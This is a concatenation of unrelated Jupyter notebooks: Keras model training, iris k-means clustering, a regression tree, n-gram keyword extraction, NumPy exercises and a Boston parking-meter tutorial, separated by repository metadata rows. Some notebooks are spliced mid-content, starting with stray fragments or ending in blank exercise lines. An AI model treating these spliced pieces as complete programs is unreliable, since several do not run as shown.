#img_d_summary = TrainValTensorBoard.plot_confusion_matrix(correct_labels, predict_labels, labels, tensor_name='image')
logs = logs or {}
val_logs = {k.replace('val_', ''): v for k, v in logs.items() if k.startswith('val_')}
for name, value in val_logs.items():
summary = tf.Summary()
summary_value = summary.value.add()
summary_value.simple_value = value.item()
summary_value.tag = name
self.val_writer.add_summary(summary, epoch)
#self.img_d_summary_writer.add_summary(img_d_summary, epoch)
self.val_writer.flush()
#self.img_d_summary_writer.flush()
# Pass the remaining logs to `TensorBoard.on_epoch_end`
logs = {k: v for k, v in logs.items() if not k.startswith('val_')}
super(TrainValTensorBoard, self).on_epoch_end(epoch, logs)
def on_train_end(self, logs=None):
super(TrainValTensorBoard, self).on_train_end(logs)
self.val_writer.close()
# + id="Fa2Rw6sASK9P" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="354f11d3-bdb9-4625-852c-9b25e9c47cc9"
hist = model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="yQynCJDdNSSG" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 393} outputId="92a256b7-31d4-4336-fd9b-b30591bf6c70"
import matplotlib.pyplot as plt
history = hist
print(history.history.keys())
plt.figure(1)
# summarize history for accuracy
plt.subplot(211)
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
# summarize history for loss
plt.subplot(212)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# + id="w39-37uhalV_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 393} outputId="dce6ee50-0fb1-41ad-ee98-cf303eba07c8"
import matplotlib.pyplot as plt
history = hist
print(history.history.keys())
plt.figure(1)
# summarize history for accuracy
plt.subplot(211)
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
# summarize history for loss
plt.subplot(212)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# + id="TB0O8GwwIQnZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="c07e9aaa-09c6-4f8e-cf4d-6b8047427ed6"
model.save_weights('ep200.h5')
# + id="hrLTa6cEBQu5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 3454} outputId="9a8bab22-607a-49a8-a347-0ede67c530eb"
hist = model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="a9RSQywJBQt-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="93669684-b995-4671-aa46-5d27b5912f2b"
from keras.preprocessing.image import ImageDataGenerator
batch_size = 32
gen = ImageDataGenerator(
horizontal_flip= True
)
train_gen = gen.flow(trainData, trainLabels, batch_size=batch_size)
test_gen = gen.flow(testData, testLabels)
# + id="t-JDH3L9BQuo" colab_type="code" colab={} outputId="7990e4bf-61e4-4201-8f94-88fd5ee90ffb"
hist = model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100)
# + id="mrnS4LRDBQuJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 37} outputId="12149faf-574f-4473-da58-dd19dd392de9"
dim = (216,216)
batch_size = test.shape[0]
n_classes = 7
n_channels = 20
shuffle = True
def data_generation_test(list_IDs_temp):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
X = np.empty((batch_size, *dim, n_channels))
y = np.empty((batch_size), dtype=int)
# Generate data
for i, ID in enumerate(list_IDs_temp):
#print(i,ID)
# Store sample
X[i,] = np.load('F://data/' + ID)
return X
# + id="jq69mhnZBQuO" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1523} outputId="e34fb91e-00b4-4a1f-955c-d3926abdefd1"
test_data = test['id']
print(test)
#test_data.shape
testData = data_generation_test(test_data)
# + id="3yLciw2UBQuR" colab_type="code" colab={} outputId="3105d30d-6872-461f-d8b6-cd5ab407b08e"
model.fit(trainData , trainLabels, validation_data=(testData , testLabels),batch_size=32, epochs=100) # ,callbacks=callbacks_list, verbose=0)
# + id="b-aZIaLmBQug" colab_type="code" colab={} outputId="d3f1f3fe-223b-47b3-8541-fd77f99da556"
#filepath="weights-improvement-{epoch:02d}-{val_acc:.2f}.hdf5"
#checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')
#callbacks_list = [checkpoint]
# Fit the model
model.fit(train_gen, validation_data=(test_gen),batch_size=32, epochs=100) # ,callbacks=callbacks_list, verbose=0)
# + id="BiNw48NVBQu1" colab_type="code" colab={}
model.save_weights("ep300over.h5")
# + id="KedCDooHBQu_" colab_type="code" colab={} outputId="7ccc8079-7e2b-4d82-951f-0901b214a458"
model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="GzSE8LcrBQvG" colab_type="code" colab={} outputId="cd76cf68-e574-4f03-8fbd-97b7bd26eafb"
model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="LL4mcfFyBQvL" colab_type="code" colab={}
model.fit(trainData,trainLabels, validation_data=(testData,testLabels),batch_size=32, epochs=100, callbacks=[SensitivitySpecificityCallback(),TrainValTensorBoard(write_graph=False)])#ConfusionMatrixPlotter])#TrainValTensorBoard(write_graph=False)])
# + id="56V6w8FQBQvP" colab_type="code" colab={} outputId="7d4f1eac-0dc0-419e-abf8-427af77dfe8d"
model.fit_generator(train_gen, steps_per_epoch=train_gen.n, epochs=100, validation_data=test_gen,validation_steps=test_gen.n,callbacks=[TrainValTensorBoard(write_graph=False)])
# + id="EfW6rz5cBQvY" colab_type="code" colab={}
# + id="dj4k2JlzBQvf" colab_type="code" colab={}
# + id="S_JiPO00BQvm" colab_type="code" colab={} outputId="a0deb7ac-e6aa-491c-e638-a875a2b1eb96"
hist.history
# + id="oQhOCia-BQvs" colab_type="code" colab={}
model.save_weights('ep108.h5')
# + id="zadim11PBQvx" colab_type="code" colab={}
pred = model.predict_classes(testData)
# + id="A0gy2Z5rBQv6" colab_type="code" colab={} outputId="bd38d90f-dba4-42e6-dcfd-5b87b8f05701"
for i in pred:
print(i)
# + id="GTCnTWffBQwB" colab_type="code" colab={}
# + id="FtFeRWgfBQwH" colab_type="code" colab={}
# + id="PzSR0JafBQwN" colab_type="code" colab={}
# + id="VE3h1f9uBQwV" colab_type="code" colab={}
# + id="bFXCz23ZBQwZ" colab_type="code" colab={}
# + id="XNz2ZlFdBQwg" colab_type="code" colab={}
# + id="7vXXwN99BQwq" colab_type="code" colab={}
# + id="Rs9O-1nj2I-y" colab_type="code" colab={}
# + id="c1F_Ts492JDG" colab_type="code" colab={}
| 91,251 |
/.ipynb_checkpoints/Project1-checkpoint.ipynb
|
89cb5d1198c9430401fe4c6504d9d79ea764ae69
|
[] |
no_license
|
ujcheon/Data_Mining
|
https://github.com/ujcheon/Data_Mining
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 60,622 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Introduction to Data Mining - Project 1
# ID: 1813128
#
# Name: 천유정
# 1) iris데이터를 이용한 클러스터 예제에서 실루엣 계수를 계산하는 라인을 추가하여 Petal width와 petal length를 사용했을 때 클러스터를 평가해보자
# +
# code for problem 1
from sklearn import cluster, datasets
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn import metrics
iris = datasets.load_iris()
X = iris.data[:,2:]
y = iris.target
k_means= cluster.KMeans(n_clusters=3).fit(X)
y_pred = k_means.predict(X)
plt.scatter(X[:,0],X[:,1],c=y_pred, cmap='viridis', edgecolor='k')
plt.xlabel('Petal length')
plt.ylabel('Petal width')
plt.scatter(k_means.cluster_centers_[:,0],k_means.cluster_centers_[:,1],c=[0,1,2], cmap='viridis', marker='^',
s=200, edgecolor='k')
plt.axis([0,X[:,0].max()+0.2,0,X[:,1].max()+0.2])
plt.show()
# 실루엣 계수
cluster_labels = y_pred
S = metrics.silhouette_score(X,cluster_labels)
print("silhouette score = {:f}".format(S))
# -
# ## ==========================================================
# 2) Sepal width와 sepal length를 사용하여 동일한 클러스터 예제를 수행해보고, 시각화 및 실루엣 계수를 계산하여 1)의 결과와 비교해보자.
# +
# code for problem 2
iris = datasets.load_iris()
X = iris.data[:,:2]
y = iris.target
k_means= cluster.KMeans(n_clusters=3).fit(X)
y_pred = k_means.predict(X)
plt.scatter(X[:,0],X[:,1],c=y_pred, cmap='viridis', edgecolor='k')
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.scatter(k_means.cluster_centers_[:,0],k_means.cluster_centers_[:,1],c=[0,1,2], cmap='viridis', marker='^',
s=200, edgecolor='k')
plt.axis([0,X[:,0].max()+0.4,0,X[:,1].max()+0.4])
plt.show()
# 실루엣 계수
cluster_labels = y_pred
S = metrics.silhouette_score(X,cluster_labels)
print("silhouette score = {:f}".format(S))
# -
# # 비교 설명
#
# ### 시각화 : 1번은 2번에 비해 클러스터가 서로 떨어져 있어서 겹치는 부분이 적어 클러스터간의 분리가 잘 되어 있는 것 처럼 보인다. 반면, 2번은 데이터 포인트가 몰려있어서 겹치는 부분이 1번에 비해 많다. 클러스터 사이의 거리가 가까워 클러스터링이 1번에 비해 잘 되지 않은 걸로 보인다.
#
# ### 실루엣 계수 : 실루엣 계수는 1번은 0.660480 이고, 2번은 0.445053 라고 나왔다. 1번이 더 높은 것으로 보아 1번이 2번보다 클러스터 내의 응집이 더 잘된 것으로 볼 수 있다. 또한 클러스터 간의 분리도 1번이 더 잘된 것으로 볼 수 있다.
| 2,306 |
/Regression_Tree/Regression_Tree.ipynb
|
5aea541611335cd08e3566dbe2ffc843bd400aaa
|
[] |
no_license
|
ShubhamAgrawal-13/Machine-Learning
|
https://github.com/ShubhamAgrawal-13/Machine-Learning
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 238,977 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Question 3 : Decision Tree (Regression Tree)
# In this question, we have to predict the saleprice.
# Let us first import all the necessary libraries like numpy, panda, matplotlib , etc. and
# sklearn.metrics for calculating F1-Score, Confusion Matrix, r2_score, mean squared error, etc.
# ### Import Libraries
import numpy as np
import pandas as pd
from matplotlib import pyplot as mpl
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import f1_score
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.metrics import mean_absolute_error
# Let us see what our data set contains.
train_data=pd.read_csv('Datasets/q3/train.csv')
train_data
test_data=pd.read_csv('Datasets/q3/test.csv')
test_data
test_label=pd.read_csv('Datasets/q3/test_labels.csv',header=None)
test_label
# ### Preprocessing
# Now, First we will preprocess the data. By preprocessing, we mean that
#
# 1: If the column contains more than half Nan values, then we will drop that column.
#
# 2: Otherwise, For categorical data, we fill nan value by mode of the column
# and For Numerical data, we fill nan value by mean of the column.
#
# To find whether the data is categorical or not.
# we have is_categorical() function.
def is_categorical(array):
return array.dtype.name == 'object'
# +
nan_col=['Id']
threshold=int(1000*0.55)
for col in train_data:
no_of_nan=len(train_data[col])-train_data[col].count()
#print(no_of_nan)
if(no_of_nan>threshold):
nan_col.append(col)
#print(nan_col)
train_data.drop(nan_col, axis = 1, inplace = True)
test_data.drop(nan_col, axis = 1, inplace = True)
for col in test_data:
# print(train_data[col].dtype)
if(is_categorical(train_data[col])):
# print(col,'cat')
train_data[col].fillna(train_data[col].mode()[0],inplace=True)
test_data[col].fillna(test_data[col].mode()[0],inplace=True)
else:
#print(col,'num')
train_data[col].fillna(train_data[col].mean(),inplace=True)
test_data[col].fillna(test_data[col].mean(),inplace=True)
# -
# ### Weighted Mean Squared Error
# There is function calculate_mse() which calculate mse (mean squared error).
# Now, we will check mse for each column and column with minimum mse.
#
# Here, to calculate mse for a particular column, we have to calculate mse for every unique element in the mse and the minimum mse will be the column mse.
#
# for each unique val in column:
#
# splitting is done for categorical and numerical data;
#
# for categorical data :
#
# column values == val and column values != val
#
# for numerical data :
#
# column values <= val and column values > val
#
# function :
def calculate_mse(train_data):
mincol=0
minsplit=0
miny=9999999999999999999
for col in train_data.columns[:-1]:
unique_data=train_data[col].unique()
list_mse=[]
for val in unique_data:
df1=[]
df2=[]
if(is_categorical(train_data[col])):
df1=train_data[train_data[col]==val]
df2=train_data[train_data[col]!=val]
else:
df1=train_data[train_data[col]<=val]
df2=train_data[train_data[col]>val]
len1=df1.shape[0]
len2=df2.shape[0]
if(len1==0 or len2==0):
list_mse.append([99999999999999999999,val])
continue
sp1=df1['SalePrice'].to_numpy()
sp2=df2['SalePrice'].to_numpy()
mean1=np.sum(sp1)/len1
mean2=np.sum(sp2)/len2
mse1=0
mse1=np.sum((sp1-mean1)**2)
mse2=0
mse2=np.sum((sp2-mean2)**2)
weight_mean=(mse1*len1+mse2*len2)/len(train_data)
list_mse.append([weight_mean,val])
minindex=0
mini=9999999999999999999
for i in range(len(list_mse)):
if(mini>list_mse[i][0]):
mini=list_mse[i][0]
minindex=list_mse[i][1]
if(miny>mini):
miny=mini
minsplit=minindex
mincol=col
#print(col)
# print(list_col)
# list_col.sort()
# for col in list_col:
# print(col)
return [miny,minsplit,mincol]
# Now, we will build the decision tree. For that, I have made a class DecisionTree in which build() function is there.
#
# Each node in tree contains :
#
# 1. Left Child
# 2. Right Child
# 3. Val for splitting
# 4. mean of dataset of node
# 5. depth of the node
# 6. Column for splitting
#
class Node:
def __init__(self,data,split,split_col,depth):
self.left=None
self.right=None
self.data=data
self.mean=0
self.split=split
self.split_col=split_col
self.depth=depth
# +
class DecisionTree:
def __init__(self):
self.root=None
def getRoot(self):
return self.root
def build(self,data,depth):
if(depth>13):
return None
if(data.shape[0]<4):
return None
m=calculate_mse(data)
print(m)
col=m[2]
df1=[]
df2=[]
if(is_categorical(data[col])):
df1=data[data[col]==m[1]]
df2=data[data[col]!=m[1]]
else:
df1=data[data[col]<=m[1]]
df2=data[data[col]>m[1]]
# print('df1 : ',len(df1))
# print('df2 : ',len(df2))
# print('depth : ',depth)
node=Node(m,m[1],m[2],depth)
if(is_categorical(data[col])):
node.mean=data['SalePrice'].mode()[0]
else:
node.mean=data['SalePrice'].mean()
node.left=self.build(df1,depth+1)
node.right=self.build(df2,depth+1)
return node
def predicted(self,test_data,i,root):
if(root.left==None and root.right==None):
return root.mean
#print(root.split_col)
val=test_data[root.split_col][i]
if(is_categorical(test_data[root.split_col])):
if(val==root.split):
if(root.left==None):
return root.mean
else:
return self.predicted(test_data,i,root.left)
else:
if(root.right==None):
return root.mean
else:
return self.predicted(test_data,i,root.right)
else:
if(val<=root.split):
if(root.left==None):
return root.mean
else:
return self.predicted(test_data,i,root.left)
else:
if(root.right==None):
return root.mean
else:
return self.predicted(test_data,i,root.right)
def predict(self,test_data,root):
result=[]
for i in range(test_data.shape[0]):
#print("--------")
result.append(self.predicted(test_data,i,root))
#print(result)
return result
# -
# ### Function to find inorder traversal of the tree
def inorder(root):
if(root==None):
return
inorder(root.left)
print(root.data,root.depth)
inorder(root.right)
# ### Now, we build the decision tree and by creating the DecisionTree object
dt=DecisionTree()
dt.root=dt.build(train_data,0)
#inorder(dt.root)
result=dt.predict(test_data,dt.root)
# ## Printing inorder traversal of Decison Tree
inorder(dt.root)
# ### Printing the prediction result
result
# # Testing Metrics
#
# ## R2 Score
# R-squared (R2) is a statistical measure that represents the proportion of the variance for a dependent variable that's explained by an independent variable or variables in a regression model.
r2_score(result,test_label[1].to_numpy())
# ## Mean Squared Error
# In statistics, the mean squared error (MSE) or mean squared deviation (MSD) of an estimator (of a procedure for estimating an unobserved quantity) measures the average of the squares of the errors—that is, the average squared difference between the estimated values and the actual value.
mean_squared_error(result,test_label[1].to_numpy())
# ## Mean Absolute Error
# In statistics, mean absolute error (MAE) is a measure of difference between two continuous variables. Assume X and Y are variables of paired observations that express the same phenomenon.
mean_absolute_error(result,test_label[1].to_numpy())
mpl.plot(result,'r-',test_label[1].to_numpy(),label='SalePrice')
mpl.ylabel('test_labels price')
mpl.xlabel('predicted price')
mpl.legend()
9354fae70"
#Most frequently occuring words
def get_top_n_words(corpus, n=None):
vec = CountVectorizer().fit(corpus)
bag_of_words = vec.transform(corpus)
sum_words = bag_of_words.sum(axis=0)
words_freq = [(word, sum_words[0, idx]) for word, idx in
vec.vocabulary_.items()]
words_freq =sorted(words_freq, key = lambda x: x[1],
reverse=True)
return words_freq[:n]
#Convert most freq words to dataframe for plotting bar plot
top_words = get_top_n_words(corpus, n=20)
top_df = pd.DataFrame(top_words)
top_df.columns=["Word", "Freq"]
#Barplot of most freq words
import seaborn as sns
sns.set(rc={'figure.figsize':(13,8)})
g = sns.barplot(x="Word", y="Freq", data=top_df)
g.set_xticklabels(g.get_xticklabels(), rotation=30)
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="lydk1YLgvNpt" outputId="fec8f1fe-f6ad-483b-add7-61b40617e0b9"
#Most frequently occuring Bi-grams
def get_top_n2_words(corpus, n=None):
vec1 = CountVectorizer(ngram_range=(2,2),
max_features=2000).fit(corpus)
bag_of_words = vec1.transform(corpus)
sum_words = bag_of_words.sum(axis=0)
words_freq = [(word, sum_words[0, idx]) for word, idx in
vec1.vocabulary_.items()]
words_freq =sorted(words_freq, key = lambda x: x[1],
reverse=True)
return words_freq[:n]
top2_words = get_top_n2_words(corpus, n=20)
top2_df = pd.DataFrame(top2_words)
top2_df.columns=["Bi-gram", "Freq"]
print(top2_df)
#Barplot of most freq Bi-grams
import seaborn as sns
sns.set(rc={'figure.figsize':(13,8)})
h=sns.barplot(x="Bi-gram", y="Freq", data=top2_df)
h.set_xticklabels(h.get_xticklabels(), rotation=45)
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="ak4yaE3_gjp5" outputId="1ec84783-70fb-42e1-b658-50eb8a8db870"
#Most frequently occuring Tri-grams
def get_top_n3_words(corpus, n=None):
vec1 = CountVectorizer(ngram_range=(3,3),
max_features=2000).fit(corpus)
bag_of_words = vec1.transform(corpus)
sum_words = bag_of_words.sum(axis=0)
words_freq = [(word, sum_words[0, idx]) for word, idx in
vec1.vocabulary_.items()]
words_freq =sorted(words_freq, key = lambda x: x[1],
reverse=True)
return words_freq[:n]
top3_words = get_top_n3_words(corpus, n=20)
top3_df = pd.DataFrame(top3_words)
top3_df.columns=["Tri-gram", "Freq"]
print(top3_df)
#Barplot of most freq Tri-grams
import seaborn as sns
sns.set(rc={'figure.figsize':(13,8)})
j=sns.barplot(x="Tri-gram", y="Freq", data=top3_df)
j.set_xticklabels(j.get_xticklabels(), rotation=45)
# + id="cMbnelqRvs4w"
from sklearn.feature_extraction.text import TfidfTransformer
tfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)
tfidf_transformer.fit(X)
# get feature names
feature_names=cv.get_feature_names()
# fetch document for which keywords needs to be extracted
# doc=corpus[532]
doc=""
for line in corpus:
doc= doc + str(line)
#generate tf-idf for the given document
tf_idf_vector=tfidf_transformer.transform(cv.transform([doc]))
# + colab={"base_uri": "https://localhost:8080/"} id="kqlAA-hmvy48" outputId="08a044e4-3f16-478e-e867-993771d1babc"
#Function for sorting tf_idf in descending order
from scipy.sparse import coo_matrix
def sort_coo(coo_matrix):
tuples = zip(coo_matrix.col, coo_matrix.data)
return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)
def extract_topn_from_vector(feature_names, sorted_items, topn=10):
"""get the feature names and tf-idf score of top n items"""
#use only topn items from vector
sorted_items = sorted_items[:topn]
score_vals = []
feature_vals = []
# word index and corresponding tf-idf score
for idx, score in sorted_items:
#keep track of feature name and its corresponding score
score_vals.append(round(score, 3))
feature_vals.append(feature_names[idx])
#create a tuples of feature,score
#results = zip(feature_vals,score_vals)
results= {}
for idx in range(len(feature_vals)):
results[feature_vals[idx]]=score_vals[idx]
return results
#sort the tf-idf vectors by descending order of scores
sorted_items=sort_coo(tf_idf_vector.tocoo())
#extract only the top n; n here is 10
keywords=extract_topn_from_vector(feature_names,sorted_items,30)
# now print the results
print("\nText:")
print(doc)
print("\nKeywords:")
for k in keywords:
print(k,keywords[k])
| 13,760 |
/Exercise_3.ipynb
|
72fc1435656947889f608f7c9b1f5792c3740a37
|
[] |
no_license
|
SEB91QA/Python-Exercises
|
https://github.com/SEB91QA/Python-Exercises
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 33,578 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## 1) Create an array of $9$ evenly spaced numbers going from $0$ to $29$ (inclusive) and give it the variable name $r$. Find the square of each element of the array (as simply as possible). Find twice the value of each element of the array in two different ways: $(i)$ using addition and $(ii)$ using multiplication. Print out the array $r$ and each output requested above.
# +
import numpy as np
r = np.linspace(0, 29, 9)
#Square of each element
sqr = r**2
#Twice the value of each element
#(i) Sum
sm = r + r
#(ii) Multiplication
mlt = 2*r
print(r)
print(sqr)
print(sm)
print(mlt)
# -
# ## 2) Create the following arrays:
#
# ### a) an array of $100$ elements all equal to $e$, the base of the natural logarithm
#
# ### b) an array in 1-degree increments of all the angles in degrees from $0$ to $360$ degrees inclusive;
#
# ### c) an array in 1-degree increments of all the angles in radians from $0$ to $360$ degrees inclusive. Verify your answers by show- ing that $c-b*np.pi/180$ gives an array of zeros (or nearly ze-ros) where b and c are the arrays you created in parts (b) and (c);
#
# ### d) an array from $12$ to $17$, not including $17$, in $0.2$ increments;
#
# ### e) an array from $12$ to $17$, including $17$, in $0.2$ increments;
# +
import numpy as np
#(a)
e = np.ones(100)
ex = np.exp(1)*e
# -
ex
# +
#(b)
b = np.arange(0, 361, 1)
b
# +
#(c)
c = np.radians(b)
c
# -
c_2 = c-b*(np.pi/180)
c_2
# +
#(d)
np.arange(12., 17., 0.2)
# -
#(e)
np.arange(12., 17.2, 0.2)
# ## 3) The position of a ball at time $t$ dropped with zero initial velocity from a height $h_{0}$ is given by
#
# \begin{equation}
# y = h_{0} - \frac{1}{2}gt^{2}
# \end{equation}
#
# ## where $g = 9.8 m/s^{2}$. Suppose $h_{0} = 10m$. Find the sequence of times when the ball passes each half meter assuming the ball is dropped at $t = 0$. Hint: Create a NumPy array for $y$ that goes from $10$ to $0$ in increments of $−0.5$ using the arange function. Solving the above equation for $t$, show that
#
# \begin{equation}
# t = \sqrt{\frac{2(h_{0}-y)}{g}}
# \end{equation}
#
# ## Using this equation and the array you created, find the sequence of times when the ball passes each half meter. Save your code as a Python script. It should yield the following results for the $y$ and $t$ arrays:
# +
import numpy as np
h_0 = 10
y = np.arange(10., 0., -0.5)
y
# -
t = np.sqrt((2*(10 - y))/(9.8))
t
list(zip(t,y))
# ## 4) Recalling that the average velocity over an interval $\Delta t$ is defined as $\bar{v}$ = $\Delta y/\Delta t$, find the average velocity for each time interval in the previous problem using NumPy arrays. Keep in mind that the number of time intervals is one less than the number of times. Hint: What are the arrays $y[1:20]$ and $y[0:19]$? What does the array $y[1:20]-y[0:19]$ represent? (Try printing out the two arrays from the IPython shell.) Using this last array and a similar one involving time, find the array of average velocities. Bonus: Can you think of a more elegant way of representing $y[1:20]-y[0:19]$ that does not make explicit reference to the number of elements in the $y$ array—one that would work for any length array?
#
y
t
y[1:20]
y[0:19]
y[1:20] - y[0:19]
t[1:20]
t[0:19]
t[1:20]-t[0:19]
v = (y[1:20] - y[0:19])/(t[1:20]-t[0:19])
v
# ### Using the $b[:-1]$
y[1:]
y[:-1]
v_2 = (y[:-1]-y[1:])/(t[:-1]-t[1:])
v_2
# ## Bonus: Calculate the acceleration as a function of time using the formula $\bar{a} = \Delta v/\Delta t$. Take care, as you will need to define a new time array that corresponds to the times where the velocities are calculated, which is midway between the times in the original time array. You should be able to justify the answer you get for the array of accelerations.
t_2 = t[:-1]-t[1:]
t_2
a = (v_2[:-1]-v_2[1:])/(t_2[:-1]-t_2[1:]) #I'm not sure if it's the correct answer
a
# ## 5) Perform the following tasks with NumPy arrays. All of them can be done (elegantly) in $1$ to $3$ lines.
#
# ### (a) Create an $8\times8$ array with ones on all the edges and zeros everywhere else.
#
# ### (b) Create an $8\times8$ array of integers with a checkerboard pattern of ones and zeros.
#
# ### (c) Given the array $c = np.arange(2, 50, 5)$, make all the num- bers not divisible by $3$ negative.
#
# ### (d) Find the size, shape, mean, and standard deviation of the arrays you created in parts $(a)–(c)$.
#
# +
#(a)
import numpy as np
a = np.ones((8,8))
a[1:-1,1:-1] = 0 #In each line it starts with the line 1 and it goes to -1 (The last element)
# +
#(b)
b = np.ones((8,8))
b[::2,1::2] = 0
b[1::2,::2] = 0
b
# +
#(c)
c = np.arange(2, 50, 5)
c[(c%3) == 0 ] = c[(c%3) == 0 ]*(-1)
c
# +
#(d)
#(a-d)
print(a.shape)
print(a.size)
print(a.mean())
a.std()
# +
#(b-d)
print(b.shape)
print(b.size)
print(b.mean())
b.std()
# +
#(c-d)
print(c.shape)
print(c.size)
print(c.mean())
c.std()
# -
| 5,158 |
/04_ML/52_OpenCV_drawing.ipynb
|
ccdf19de87fcc8c2c2fca8f3f5adae01053e8633
|
[] |
no_license
|
kkobooc/DSS
|
https://github.com/kkobooc/DSS
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 650,812 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Metered Parking in Boston
# We are going to do some analysis on what metered parking is available in the Boston area, using data taken from Boston's [Open Data Portal](https://data.boston.gov/dataset/parking-meters).
#
# This file is available in the repository as a [csv](https://www.computerhope.com/issues/ch001356.htm) (comma seperated value file, similar to the type of tabular data you would work with in excel).
# 
# #### Exercise Notes:
# `Syntax will be contained in code blocks like this.`
#
# *Italicized portions of the example syntax should be replaced with the your variables*. Normal text (not italicized) should be copied precisely.
#
# We will cover:
# [Step 1: Importing Libraries](#Step-1:-Import-the-libraries-you-plan-to-use)
# [Step 2: Loading a CSV](#Step-2:-Loading-a-CSV)
# [Step 3: Exploring the data](#Step-3:-Exploring-the-data)
# [Step 4: Reorganizing the Data](#Step-4:-Reorganizing-the-Data)
# [Step 5: Mapping the Data](#Step-5:-Mapping-the-Data)
# [Step 6: Exporting Files](#Step-6:-Exporting-Files)
#
#
#
# ## Step 1: Import the libraries you plan to use
#
# (This is done in the first lines of your script. Always keep in mind that the script will run in order and won't have access to variables and functions set later in the file, just as you wouldn't be able to give someone the weather report if you hadn't looked it up yet.)
#
# We will use:
# - [pandas](https://pandas.pydata.org/pandas-docs/stable/reference/index.html). This library allows us to easily manipulate and analyze data structures.
# - [folium](https://python-visualization.github.io/folium/) for data vizualization with leaflet maps
# - [geopy](https://github.com/geopy/geopy) for converting coordinates to addresses (reverse geocoding)
#
# importing "as pd" allows us nickname pandas so that instead of typing the full name later, we can substitute "pd"
# Example: (pandas.dataframe.columns can instead be typed pd.dataframe.columns)
import pandas as pd
import geopandas as gp
from geopy.geocoders import Nominatim
from geopy.extra.rate_limiter import RateLimiter #optional for our purposes
import folium
#
# ## Step 2: Loading a CSV
# 
#
# Pandas comes with built in functionality to read in a csv
# The syntax is:
# `pd.read_csv('`*`file_path`*`')`
#
# To make this file easier to refer back to later, we are going to save it to a variable name of our choice. I'm going to call it boston_meters.
# +
# Remember, variable names cannot contain spaces,
# To make the name more readable you can separate words with-a-dash or_with_underscores
boston_meters = pd.read_csv('./data/parking_meters_boston.csv')
charlestown_pay = pd.read_csv('./data/charlestown_pay.csv')
# -
#load the charlestown_location.csv
charlestown_locations =
#
#
# ## Step 3: Exploring the data
# There are several techniques we can use to get a sense of what sort of data is available.
#
# Keep in mind that the code that is run will not automatically display results. If you want the program to report back to you, you will need to wrap the command (or the variable it is saved to) in a print funtion
#
# #### How many datapoints?
# To start, let's find out how much data we are dealing with. Since each row gives information about a specific parking meter, we can find out how many parking meters are reported in this dataset by getting a row count for our CSV.
#
# The syntax is:
# *`dataframe`*`.shape`
# +
# Remember we named our dataframe "boston_meters" in step 2
# Keep in mind that the code that is run will not automatically display results.
#If you want the program to report back to you, you will need to wrap the command (or the variable) in a print funtion
print()
# -
# #### What columns does this csv have?
# Let's take a look at the data available in the csv by printing the column headings. The data structure is identical for the Charlestown and Boston dataframes.
#
# The syntax is:
# *`pd.dataframe`*`.columns`
print()
